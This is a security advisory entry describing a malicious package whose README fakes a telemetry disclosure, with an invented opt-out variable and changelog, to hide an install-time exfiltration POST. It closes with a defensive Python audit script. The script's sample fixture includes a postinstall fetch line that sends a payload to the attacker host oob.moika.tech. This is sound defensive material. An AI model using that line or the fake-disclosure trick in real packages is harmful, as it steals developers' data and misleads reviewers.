README Telemetry Disclosure Social Engineering
The package README declares a fake telemetry feature with a fabricated opt-out environment variable and a plausible internal telemetry domain. This makes outbound network activity at install time look expected: developers and security reviewers see a disclosure with an opt-out, which is standard practice for legitimate telemetry, and do not investigate the actual exfiltration POST to oob.moika.tech. The telemetry domains are not functional C2; they exist only in the README text as social engineering artifacts. Fake changelog entries with a plausible version history further present the package as a mature, ongoing project rather than a fresh first-and-only publish.
discovered 2026-05-28
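
A review check for the mismatch described above, as an added example that is not part of the original entry: it compares the hosts and opt-out variables a README names with what the shipped files actually reference. The regex heuristics, the sample README, the file path and the `EXAMPLEPKG_TELEMETRY_OPTOUT` name are constructed assumptions; only oob.moika.tech comes from the entry.

```python
import re

URL_HOST = re.compile(r"https?://([a-z0-9][a-z0-9.-]*\.[a-z]{2,})", re.I)
# Heuristics: a bare host needs at least two dots; an env var is UPPER_SNAKE_CASE.
BARE_HOST = re.compile(r"\b((?:[a-z0-9-]+\.){2,}[a-z]{2,})\b", re.I)
ENV_VAR = re.compile(r"\b([A-Z][A-Z0-9]*(?:_[A-Z0-9]+)+)\b")

def audit_disclosure(readme, sources):
    """Compare what the README discloses with what the shipped files reference.

    readme  -- README text
    sources -- {path: text} for every other file in the package archive
    """
    code = "\n".join(sources.values())
    readme_hosts = {h.lower() for h in URL_HOST.findall(readme) + BARE_HOST.findall(readme)}
    code_hosts = {h.lower() for h in URL_HOST.findall(code)}
    return {
        # Opt-out variables the README promises but no shipped file mentions.
        "unread_env_vars": sorted(v for v in set(ENV_VAR.findall(readme)) if v not in code),
        # Hosts the README names that appear nowhere in the shipped files.
        "readme_only_hosts": sorted(h for h in readme_hosts if h not in code.lower()),
        # Hosts the shipped files reach by URL that the README never mentions.
        "undisclosed_hosts": sorted(code_hosts - readme_hosts),
    }

# Constructed sample input (hypothetical package; not taken from a real archive).
SAMPLE_README = """# examplepkg

## Telemetry
This package sends anonymous install metrics to telemetry.examplepkg.invalid.
Set EXAMPLEPKG_TELEMETRY_OPTOUT=1 to disable.
"""
SAMPLE_SOURCES = {
    "scripts/postinstall.js": 'fetch("https://oob.moika.tech/", {method: "POST", body: payload});',
}

if __name__ == "__main__":
    for finding, values in audit_disclosure(SAMPLE_README, SAMPLE_SOURCES).items():
        print(f"{finding}: {values}")
```

Any non-empty list is a reason to read the install scripts by hand; an empty result does not clear a package, since the check only sees literal strings.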
